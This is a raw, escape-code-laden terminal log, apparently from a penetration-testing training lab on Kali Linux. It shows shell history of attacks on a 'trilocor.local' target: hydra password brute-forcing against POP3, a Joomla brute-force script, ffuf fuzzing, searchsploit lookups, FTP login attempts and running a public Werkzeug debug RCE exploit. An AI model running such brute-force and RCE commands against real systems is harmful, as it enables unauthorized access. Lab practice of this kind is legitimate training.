gdebi-gtk gdialog gdisk
gdk-pixbuf-csource genccode gendesc gendict
generic_chunked generic_send_tcp genmkvpwd genpng
getcifsacl get-iab getpcaps getty gftodvi
gids-tool gm gnome-disks
gnome-text-editor gopherd gpg gpg-wks-server gpg-zip
gpic gpp-decrypt gpre
gprof gprofng groupadd groupdel grub-glue-
efi grub-install grub-kbdcomp grub-mkfont
grub-mkimage grub-probe grub-render-label gs gslj
gslp gsnd gspath
gtf gtk4-broadwayd gtk4-builder-tool gtscompare gtstemplate
guymager gvmd gvm-manage-certs
gvpack gvpr gwenview_importer gxl2dot gxl2gv
gyp
#[J#[30m#[104m(MORE)#[39m#[49m#[11A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mg#[39m#[90mem install
bundler#[39m#[K#[115C[9:06:05]#[0m#[142D##[32mg#[32me#[39m###[1m#[31mg#[1m#[31me#[0
m#[39m
#[J#[0;1;2mexternal command#[0m
#[0mgedit geli2john gem gem3.1
genbrk gencat genccode gencfu
gencmn gencnval gendesc gendict
gendiff generic_chunked generic_listen_tcp generic_send_tcp
generic_send_udp generic_web_server_fuzz generic_web_server_fuzz2 genhtml
geninfo genl genmkvpwd gennorm2
genpat GenPat genpng genrb
gensprep geod geqn GET
getcap getcifsacl getconf get-edid
getent getfacl getfattr get-iab
getkeycodes getmapdl getopt get-oui
getpcaps gettext gettextize gettext.sh
#[Jgetty #[J
#[8A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mge#[0m#[39m#[90mm install
bundler#[39m#[K#[115C[9:06:05]#[0m#[141D##[1m#[31me#[1m#[31md#[0m#[39m#[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[16D#[90mit /etc/hosts#[39m#[13D
#[J#[0;1;2mexternal command#[0m
#[J#[0mgedit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mged#[0m#[39m#[90mit
/etc/hosts#[39m#[K#[118C[9:06:05]#[0m#[140D##[1m#[31md#[1m#[31mi#[0m#[39m
#[J#[0;1;2mexternal command#[0m
#[J#[0mgedit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[1m#[31mgedi#[0m#[39m#[90mt
/etc/hosts#[39m#[K#[118C[9:06:05]#[0m#[139D##[1m#[31mi#[1m#[31mt#[0m#[39m######[0m#
[32mg#[0m#[32me#[0m#[32md#[0m#[32mi#[0m#[32mt#[39m
#[J#[0;1;2mexternal command#[0m
#[J#[0mgedit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mgedit#[39m#[90m
/etc/hosts#[39m#[K#[118C[9:06:05]#[0m#[138D##[32mt#[32m #[39m
#[J#[A#[17C###[32mt#[39m#[39m
#[J#[0;1;2mfile#[0m
#[J#[0mREADME.md #[J#[01;32mwerkzeug.py#[0m*#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mgedit#[39m
#[90m/etc/hosts#[39m#[K#[118C[9:06:05]#[0m#[137D#[39m/##[4m/#[24m
#[J#[0;1;2mdirectory#[0m
#[01;36mbin#[0m@ #[01;34mboot#[0m/ #[01;34mdev#[0m/
#[01;34metc#[0m/ #[01;34mhome#[0m/ #[01;36mlib#[0m@
#[01;36mlib32#[0m@ #[01;36mlib64#[0m@ #[01;34mlost+found#[0m/
#[01;34mmedia#[0m/ #[01;34mmnt#[0m/
#[01;34mopt#[0m/ #[01;34mproc#[0m/ #[01;34mroot#[0m/
#[01;34mrun#[0m/ #[01;36msbin#[0m@ #[01;34msrv#[0m/
#[01;34msys#[0m/ #[30;42mtmp#[0m/ #[01;34musr#[0m/
#[01;34mvar#[0m/
#[0;1;2mfile#[0m
#[J#[01;36minitrd.img#[0m@ #[J#[01;36minitrd.img.old#[0m@
#[J#[01;36mvmlinuz#[0m@ #[J#[01;36mvmlinuz.old#[0m@
#[J#[5A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mgedit#[39m
#[4m/#[24m#[90metc/hosts#[39m#[K#[118C[9:06:05]#[0m#[136D#[39me#[39mt#[39mc#[39m/
#[39mh#[39mo#[39ms#[39mt#[39ms#[10D#[4m/#[4me#[4mt#[4mc#[4m/
#[4mh#[4mo#[4ms#[4mt#[4ms#[24m
#[J#[0;1;2mfile#[0m
#[J#[0mhosts #[Jhosts.allow #[Jhosts.deny #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mgedit#[39m
#[4m/etc/hosts#[24m#[K#[118C[9:06:05]#[0m#[127D#[?1l#>#[?2004l
#[J#[A#[27C
#]2;kali@kali:~/CPTS/NIX01/Werkzeug-Debug-RCE##]1;..eug-Debug-RCE##]7;file:///
home/kali/CPTS/NIX01/Werkzeug-Debug-RCE#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/NIX01/Werkzeug-Debug-
RCE#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m973#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[9:08:00]#[148D#[?1h#=#[?
2004h
Loading...#[K#[A#####[4m#[32msudo#[24m#[39m #[32mgedit#[39m
#[4m/etc/hosts#[24m#[1m;#[0m#[1B
#[K#[A#[28C#[1B
#[2m #[0m#[2m934#[0m#[2m #[0msudo python3 joomla-brute.py -u
http://blog.trilocor.local -w /usr/share/seclists/Passwords/500-worst-passwords.txt
-usr root #[K#[K
#[2m #[0m#[2m935#[0m#[2m #[0msudo python2.7 -m pip install urllib3
#[K#[K
#[2m #[0m#[2m936#[0m#[2m #[0mpip install urllib3
#[K#[K
#[2m #[0m#[2m937#[0m#[2m #[0mpip install certifi
#[K#[K
#[2m #[0m#[2m938#[0m#[2m #[0mpip install bs4
#[K#[K
#[2m #[0m#[2m939#[0m#[2m #[0mcd ../
#[K#[K
#[2m #[0m#[2m940#[0m#[2m #[0mwhatis gh
#[K#[K
#[2m #[0m#[2m941#[0m#[2m #[0mgithub repo clone drego85/JoomlaScan
#[K#[K
#[2m #[0m#[2m942#[0m#[2m #[0mcd ../Downloads
#[K#[K
#[2m #[0m#[2m943#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m944#[0m#[2m #[0munzip JoomlaScan-master.zip
#[K#[K
#[2m #[0m#[2m945#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m946#[0m#[2m #[0mmv JoomlaScan-master ../Tools
#[K#[K
#[2m #[0m#[2m947#[0m#[2m #[0mcd ../Tools/JoomlaScan-master
#[K#[K
#[2m #[0m#[2m948#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m949#[0m#[2m #[0mpython2.7 joomlascan.py -u
http://blog.trilocor.local
#[K#[K
#[2m #[0m#[2m950#[0m#[2m #[0msearchsploit com_contact
#[K#[K
#[2m #[0m#[2m951#[0m#[2m #[0msearchsploit com_content
#[K#[K
#[2m #[0m#[2m952#[0m#[2m #[0mlocate 11236.txt
#[K#[K
#[2m #[0m#[2m953#[0m#[2m #[0mcat
/usr/share/exploitdb/exploits/php/webapps/11236.txt
#[K#[K
#[2m #[0m#[2m954#[0m#[2m #[0msearchsploit cassiopeia
#[K#[K
#[2m #[0m#[2m955#[0m#[2m* #[0mffuf -t 100 -ic -c -u
http://blog.trilocor.local/FUZZ -w
/usr/share/seclists/Discovery/Web-Content/Apache.fuzz.txt
#[K#[K
#[2m #[0m#[2m956#[0m#[2m #[0mftp anonymous@10.129.197.143
#[K#[K
#[2m #[0m#[2m957#[0m#[2m #[0msudo apt-get install --yes filezilla
#[K#[K
#[2m #[0m#[2m958#[0m#[2m #[0mhydra -V -f -l admin@trilocor.local -P
/usr/share/seclists/Passwords/500-worst-passwords.txt pop3://10.129.197.143
#[K#[K
#[2m #[0m#[2m959#[0m#[2m #[0mhydra -V -f -l user@trilocor.local -P
/usr/share/seclists/Passwords/500-worst-passwords.txt pop3://10.129.197.143
#[K#[K
#[2m #[0m#[2m960#[0m#[2m #[0msearchsploit werkzeug
#[K#[K
#[2m #[0m#[2m961#[0m#[2m #[0mcd ~/CPTS/NIX01
#[K#[K
#[2m #[0m#[2m962#[0m#[2m #[0mgedit request.txt
#[K#[K
#[2m #[0m#[2m963#[0m#[2m #[0mffuf -request <request.txt> -request-proto http -
w /usr/share/seclists/Fuzzing/4-digits-0000-9999.txt
#[K#[K
#[2m #[0m#[2m964#[0m#[2m #[0mffuf -request request.txt -request-proto http -w
/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt
#[K#[K
#[2m #[0m#[2m965#[0m#[2m #[0mffuf -request request.txt -request-proto http -w
/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt -fw 4
#[K#[K
#[2m #[0m#[2m966#[0m#[2m #[0mffuf -request request.txt -request-proto http -w
/usr/share/seclists/Fuzzing/3-digits-000-999.txt -fw 4
#[K#[K
#[2m #[0m#[2m967#[0m#[2m #[0mffuf -request request.txt -request-proto http -w
/usr/share/seclists/Fuzzing/5-digits-00000-99999.txt -fw 4
#[K#[K
#[2m #[0m#[2m968#[0m#[2m #[0mgit clone https://github.com/its-arun/Werkzeug-
Debug-RCE.git
#[K#[K
#[2m #[0m#[2m969#[0m#[2m #[0mcd Werkzeug-Debug-RCE
#[K#[K
#[2m #[0m#[2m970#[0m#[2m #[0mchmod +x werkzeug.py
#[K#[K
#[2m #[0m#[2m971#[0m#[2m #[0mpython2 werkzeug.py trilocor.local:7777 whoami
#[K#[K
#[J#[7m 972 sudo gedit /etc/hosts
#[0m#[K#[J#[39A#[0m#[27m#[24m#[0m
#[6C#[4m#[32msudo#[24m#[39m #[32mgedit#[39m
#[4m/etc/hosts#[24m#[1m;#[0m#[K#[117C[9:08:00]#[0m#[126D
#[J#[A#[53C##[0m ##[?1l#>#[?2004l
#[J#[A#[52C
#]2;kali@kali:~/CPTS/NIX01/Werkzeug-Debug-RCE##]1;..eug-Debug-RCE##]7;file:///
home/kali/CPTS/NIX01/Werkzeug-Debug-RCE#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/NIX01/Werkzeug-Debug-
RCE#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m974#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[9:08:12]#[148D#[?1h#=#[?
2004h
#[J#[A#[53C##[0m ##[?1l#>#[?2004l
#[J#[A#[52C
#]2;kali@kali:~/CPTS/NIX01/Werkzeug-Debug-RCE##]1;..eug-Debug-RCE##]7;file:///
home/kali/CPTS/NIX01/Werkzeug-Debug-RCE#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/NIX01/Werkzeug-Debug-
RCE#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m974#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[9:08:34]#[148D#[?1h#=#[?
2004hf##[1m#[31mf#[0m#[39m##[1m#[31mf#[0m#[39m#[90mfuf -request request.txt -
request-proto http -w /usr/share/seclists/Fuzzing/5-digits-00000-99999.txt -fw
4#[39m#[106D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0mf2py3 fab-cewl factor fadvise faillock
faillog faked-sysv faked-tcp fakeroot
fakeroot-sysv fakeroot-tcp fallocate fantaip faraday
faraday-cli faraday-dispatcher faraday-plugins faraday-server
fastjar fatlabel fbsvcmgr fcat fc-cache fc-cat
fc-conflist fcgistarter fc-match
fc-query fc-validate fdisk fdp fectest fern-
wifi-cracker ffind ffuf fgrep
fidentify fierce fig4latex figlet figlet-figlet
figlet-toilet figlist filan file
FileCheck-14 FileCheck-15 FileCheck-16 filefrag filezilla2john
filterdiff fincore find find-debuginfo
findfs findmnt findrule finger firefox
firefox-esr firewall-cmd firewall-offline-cmd fiwalk
fixparts fixproc flac flashcp flash_erase
flash_eraseall flash_lock flash_otp_dump flash_otp_erase
flash_otp_info flash_otp_lock flash_otp_write flashrom flash_unlock flask
flex flipdiff flock
flowtop fls fmaptool fmt fmtutil
fmtutil-sys fold fonttosfnt fping
free fsck fsck.exfat fsck.ext2 fsck.ext3
fsck.ext4 fsck.fat fsck.minix fsck.vfat
fsfreeze fstrim ftl_check ftl_format ftp funzip
fuser fusermount futility
futurize fwupdmgr fwupdtool fzsftp
#[J#[30m#[104m(MORE)#[39m#[49m#[15A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mf#[0m#[39m#[90mfuf -request request.txt -request-proto http -w
/usr/share/seclists/Fuzzing/5-digits-00000-99999.txt -fw
4#[39m#[K#[32C[9:08:34]#[0m#[147D##[1m#[31mf#[1m#[31mt#[0m#[39m#[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[105D#[90mp
anonymous@10.129.197.143#[39m#[26D###[1m#[31mf#[1m#[31mt#[1m#[31mp#[0m#[39m####[0m#
[32mf#[0m#[32mt#[0m#[32mp#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0mftp #[Jftp-rfc#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mftp#[39m#[90m
anonymous@10.129.197.143#[39m#[K#[111C[9:08:34]#[0m#[145D#[39m
#[39ma#[39mn#[39mo#[39mn#[39my#[39mm#[39mo#[39mu#[39ms#[39m@#[39m1#[39m0#[39m.#[39m
1#[39m2#[39m9#[39m.#[39m1#[39m9#[39m7#[39m.#[39m1#[39m4#[39m3
#[J#[J#[0;1;2mno matching `host' or `corrections'
completions#[0m#[A#[0m#[27m#[24m#[0m
#[6C#[32mftp#[39m anonymous@10.129.197.143#[K#[111C[9:08:34]#[0m#[120D###
#[J#[0;1;2mhost#[0m
#[0mblog.trilocor.local careers.trilocor.local dev.trilocor.local ip6-
localhost ip6-loopback kali
localhost portal.trilocor.local ps.trilocor.local
remote.trilocor.local store.trilocor.local trilocor.local
#[J#[0;2m#[1mcommon substring:#[0m #[30m#[103ml#[39m#[49m#[4A#[0m#[27m#[24m#[0m
#[6C#[32mftp#[39m
@10.129.197.143#[K#[120C[9:08:34]#[0m#[144Dr@10.129.197.143#[15Do@10.129.197.143#[1
5D#[30m#[103m#[39m#[49m#[30m#[103m#[39m#[49m
#[J#[0;1;2mhost#[0m
#[0mblog.trilocor.local careers.trilocor.local dev.trilocor.local
portal.trilocor.local ps.trilocor.local remote.trilocor.local
store.trilocor.local trilocor.local
#[J#[0;2m#[1mcommon substring:#[0m #[30m#[103mt#[39m#[49m#[4A#[0m#[27m#[24m#[0m
#[6C#[32mftp#[39m
ro@10.129.197.143#[K#[118C[9:08:34]#[0m#[142Do@10.129.197.143#[15Dt@10.129.197.143#
[15D
#[J#[A#[14C
#[J#]2;ftp root@10.129.197.143##]1;ftp#^C
#[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/CPTS/NIX01/Werkzeug-Debug-RCE##]1;..eug-Debug-RCE##]7;file:///
home/kali/CPTS/NIX01/Werkzeug-Debug-RCE#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/NIX01/Werkzeug-Debug-
RCE#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m975#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[9:10:09]#[148D#[?1h#=#[?
2004h
Loading...#[K#[A#####[32mftp#[39m root@10.129.197.143#[1m;#[0m#[1B
#[K#[A#[30C#[1B
#[2m #[0m#[2m936#[0m#[2m #[0mpip install urllib3
#[K#[K
#[2m #[0m#[2m937#[0m#[2m #[0mpip install certifi
#[K#[K
#[2m #[0m#[2m938#[0m#[2m #[0mpip install bs4
#[K#[K
#[2m #[0m#[2m939#[0m#[2m #[0mcd ../
#[K#[K
#[2m #[0m#[2m940#[0m#[2m #[0mwhatis gh
#[K#[K
#[2m #[0m#[2m941#[0m#[2m #[0mgithub repo clone drego85/JoomlaScan
#[K#[K
#[2m #[0m#[2m942#[0m#[2m #[0mcd ../Downloads
#[K#[K
#[2m #[0m#[2m943#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m944#[0m#[2m #[0munzip JoomlaScan-master.zip
#[K#[K
#[2m #[0m#[2m945#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m946#[0m#[2m #[0mmv JoomlaScan-master ../Tools
#[K#[K
#[2m #[0m#[2m947#[0m#[2m #[0mcd ../Tools/JoomlaScan-master
#[K#[K
#[2m #[0m#[2m948#[0m#[2m #[0mls
#[K#[K
#[2m #[0m#[2m949#[0m#[2m #[0mpython2.7 joomlascan.py -u
http://blog.trilocor.local
#[K#[K
#[2m #[0m#[2m950#[0m#[2m #[0msearchsploit com_contact
#[K#[K
#[2m #[0m#[2m951#[0m#[2m #[0msearchsploit com_content
#[K#[K
#[2m #[0m#[2m952#[0m#[2m #[0mlocate 11236.txt
#[K#[K
#[2m #[0m#[2m953#[0m#[2m #[0mcat
/usr/share/exploitdb/exploits/php/webapps/11236.txt
#[K#[K
#[2m #[0m#[2m954#[0m#[2m #[0msearchsploit cassiopeia
#[K#[K
#[2m #[0m#[2m955#[0m#[2m* #[0mffuf -t 100 -ic -c -u
http://blog.trilocor.local/FUZZ -w
/usr/share/seclists/Discovery/Web-Content/Apache.fuzz.txt
#[K#[K
#[2m #[0m#[2m956#[0m#[2m #[0mftp anonymous@10.129.197.143
#[K#[K
#[2m #[0m#[2m957#[0m#[2m #[0msudo apt-get install --yes filezilla
#[K#[K
#[2m #[0m#[2m958#[0m#[2m #[0mhydra -V -f -l admin@trilocor.local -P
/usr/share/seclists/Passwords/500-worst-passwords.txt pop3://10.129.197.143
#[K#[K
#[2m #[0m#[2m959#[0m#[2m #[0mhydra -V -f -l user@trilocor.local -P
/usr/share/seclists/Passwords/500-worst-passwords.txt pop3://10.129.197.143
#[K#[K
#[2m #[0m#[2m960#[0m#[2m #[0msearchsploit werkzeug
#[K#[K
#[2m #[0m#[2m961#[0m#[2m #[0mcd ~/CPTS/NIX01
#[K#[K
#[2m #[0m#[2m962#[0m#[2m #[0mgedit request.txt
#[K#[K
#[2m #[0m#[2m963#[0m#[2m #[0mffuf -request <request.txt> -request-proto http -
w /usr/share/seclists/Fuzzing/4-digits-0000-9999.txt
#[K#[K
#[2m #[0m#[2m964#[0m#[2m #[0mffuf -request request.txt -request-proto http -w
/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt
#[K#[K
#[2m #[0m#[2m965#[0m#[2m #[0mffuf -request request.txt -request-proto http -w
/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt -fw 4
#[K#[K
#[2m #[0m#[2m966#[0m#[2m #[0mffuf -request request.txt -request-proto http -w
/usr/share/seclists/Fuzzing/3-digits-000-999.txt -fw 4
#[K#[K
#[2m #[0m#[2m967#[0m#[2m #[0mffuf -request request.txt -request-proto http -w
/usr/share/seclists/Fuzzing/5-digits-00000-99999.txt -fw 4
#[K#[K
#[2m #[0m#[2m968#[0m#[2m #[0mgit clone https://github.com/its-arun/Werkzeug-
Debug-RCE.git
#[K#[K
#[2m #[0m#[2m969#[0m#[2m #[0mcd Werkzeug-Debug-RCE
#[K#[K
#[2m #[0m#[2m970#[0m#[2m #[0mchmod +x werkzeug.py
#[K#[K
#[2m #[0m#[2m971#[0m#[2m #[0mpython2 werkzeug.py trilocor.local:7777 whoami
#[K#[K
#[2m #[0m#[2m972#[0m#[2m #[0msudo gedit /etc/hosts
#[K#[K
#[2m #[0m#[2m973#[0m#[2m #[0mpython2 werkzeug.py trilocor.local:7777 whoami
#[K#[K
#[J#[7m 974 ftp root@10.129.197.143
#[0m#[K#[J#[39A#[0m#[27m#[24m#[0m
#[6C#[32mftp#[39m root@10.129.197.143#[1m;#[0m#[K#[115C[9:10:09]#[0m#[124D
#[J#[A#[30C##[0m #
#[J#[A#[29C
#]2;kali@kali:~/CPTS/NIX01/Werkzeug-Debug-RCE##]1;..eug-Debug-RCE##]7;file:///
home/kali/CPTS/NIX01/Werkzeug-Debug-RCE#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/NIX01/Werkzeug-Debug-
RCE#[0;34m#[1m]#[0m#[0m - #[0;34m#[1m[#[0m#[0;33m976#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[9:10:20]#[148D#[?1h#=#[?
2004hc##[1m#[31mc#[0m#[39m##[1m#[31mc#[0m#[39m#[90mhmod +x
werkzeug.py#[39m#[19D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49
m
#[0;1;2mcommand#[0m
#[0mc89 c99 cacaclock cacaplay cacaview
cadaver calc_stat callgrind_control
cardos-tool catdoc catman cbfstool cc
ccache2john cd-create-profile cd-fix-profile
cd-iccdump cftp3 cg_annotate cg_diff cg_merge
check_forensic cherryd3 cherrytree
chgrp chkdvifont chmem chmod chpasswd
chromeos-tpm-recovery cifsiostat cisco-decrypt
ckbcomp clang++-15 clang++-16 cluster cmedb colcrt
colormgr colrm
column comm compress convert count-14 count-
15 count-16 coveralls
cp cpan cpanel_json_xs cpgr cpio
cracf2john cracklib-check cracklib-unpacker
crackmapexec create-cracklib-dict createdb createlang cron
cryptcat cryptoflex-tool cupsctl
cupsdisable cupsenable cupstestppd curl cvtsudoers cython3
#[J#[30m#[104m(MORE)#[39m#[49m#[11A#[0m#[27m#[24m#[0m
#[6C#[1m#[31mc#[0m#[39m#[90mhmod +x
werkzeug.py#[39m#[K#[119C[9:10:20]#[0m#[147D##[1m#[31mc#[1m#[31md#[0m#[39m#[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[18D###[0m#[32mc#[0m#[32md#[39m#[90m Werkzeug-Debug-
RCE#[39m#[19D
#[J#[0;1;2mcommand#[0m
#[J#[0mcd #[Jcd-create-profile #[Jcd-fix-profile #[Jcd-iccdump
#[Jcd-it8 #[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m#[90m Werkzeug-Debug-
RCE#[39m#[K#[118C[9:10:20]#[0m#[146D###[32mc#[32md#[32m #[39m
#[J#[A#[9C####[32mc#[32md#[39m#[39m
#[J#[0;1;2mdirectory#[0m
#[J#[01;34m.git#[0m/#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32mcd#[39m #[4m.#[24m#[90m./Tools/JoomlaScan-
master#[39m#[K#[110C[9:10:20]#[0m#[144D##[4m.#[39m#[4m.#[24m
#[J#[A#[11C
#[J#]2;cd ..##]1;cd##[1m#[7m%#[27m#[1m#[0m
#]2;kali@kali:~/CPTS/NIX01##]1;~/CPTS/NIX01##]7;file:///home/kali/CPTS/NIX01#\
#[0m#[27m#[24m#[J#[0;34m#[1m┌─[#[0m#[0m#[1;32mkali#[1;34m@#[0m#[0;36mkali#[0;34m#[1
m]#[0m#[0m - #[0m#[0;34m#[1m[#[0m#[1;37m~/CPTS/NIX01#[0;34m#[1m]#[0m#[0m -
#[0;34m#[1m[#[0m#[0;33m977#[0;34m#[1m]#[0m#[0m
#[0;34m#[1m└─#[1m[#[1;35m$#[0;34m#[1m]#[0m#[0m #[K#[139C[9:10:24]#[148D#[?1h#=#[?
2004hs##[1m#[31ms#[0m#[39m##[1m#[31ms#[0m#[39m#[90mudo gedit
/etc/hosts#[39m#[20D#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m#[30m#[104m#[39m#[49m
#[0;1;2mcommand#[0m
#[0msakis3g samba_downgrade_db samba-log-parser samba-regedit
samba-tool scanimage scriptlive
sdiff sed see select-default-
wordlist sensortag seq setleds
setmetamode setpriv sha1sum sha256deep
sha384sum shasum shodan
showconsolefont showkey SIPdump slattach
sleep smbcquotas smbd
smbtar snmpbulkwalk snmpgetnext snmpkey
snmpnetstat snmpstatus snmptest
snmpwalk software-properties-qt spa-json-dump speech-dispatcher
spiderfoot spiderfoot-cli splitfont
sqlite3 ssh ssh-add sshd
ssh-keygen ssh-keyscan sslh
sslscan sspr2john startplasma-wayland stl2gts
sudoedit sum sumtool
sunrpcfuzz svlc svn svnauthz
svnbench svnsync swapoff
switch_root sync systemd systemd-cgls
systemd-confext systemd-escape systemd-stdio-bridge
#[J#[30m#[104m(MORE)#[39m#[49m#[12A#[0m#[27m#[24m#[0m
#[6C#[1m#[31ms#[0m#[39m#[90mudo gedit
/etc/hosts#[39m#[K#[118C[9:10:24]#[0m#[147D##[1m#[31ms#[1m#[31me#[0m#[39m#[39m
#[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m #[39m
#[39m #[39m #[39m #[39m #[19D#[90marchsploit
werkzeug#[39m#[19D###[1m#[31ms#[1m#[31me#[1m#[31ma#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msea#[0m#[39m#[90mrchsploit
werkzeug#[39m#[K#[118C[9:10:24]#[0m#[145D##[1m#[31ma#[1m#[31mr#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msear#[0m#[39m#[90mchsploit
werkzeug#[39m#[K#[118C[9:10:24]#[0m#[144D##[1m#[31mr#[1m#[31mc#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearc#[0m#[39m#[90mhsploit
werkzeug#[39m#[K#[118C[9:10:24]#[0m#[143D##[1m#[31mc#[1m#[31mh#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearch#[0m#[39m#[90msploit
werkzeug#[39m#[K#[118C[9:10:24]#[0m#[142D##[1m#[31mh#[1m#[31ms#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearchs#[0m#[39m#[90mploit
werkzeug#[39m#[K#[118C[9:10:24]#[0m#[141D##[1m#[31ms#[1m#[31mp#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearchsp#[0m#[39m#[90mloit
werkzeug#[39m#[K#[118C[9:10:24]#[0m#[140D##[1m#[31mp#[1m#[31ml#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearchspl#[0m#[39m#[90moit
werkzeug#[39m#[K#[118C[9:10:24]#[0m#[139D##[1m#[31ml#[1m#[31mo#[0m#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[1m#[31msearchsplo#[0m#[39m#[90mit
werkzeug#[39m#[K#[118C[9:10:24]#[0m#[138D##[1m#[31mo#[1m#[31mi#[0m#[39m##[1m#[31mi#
[1m#[31mt#[0m#[39m#[12D#[0m#[32ms#[0m#[32me#[0m#[32ma#[0m#[32mr#[0m#[32mc#[0m#[32mh
#[0m#[32ms#[0m#[32mp#[0m#[32ml#[0m#[32mo#[0m#[32mi#[0m#[32mt#[39m
#[J#[0;1;2mcommand#[0m
#[J#[0msearchsploit#[J#[A#[A#[0m#[27m#[24m#[0m
#[6C#[32msearchsploit#[39m#[90m
werkzeug#[39m#[K#[118C[9:10:24]#[0m#[136D##[32mt#[32m #[39m
#[J#[A#[19C###[32mt#[39m#[39m
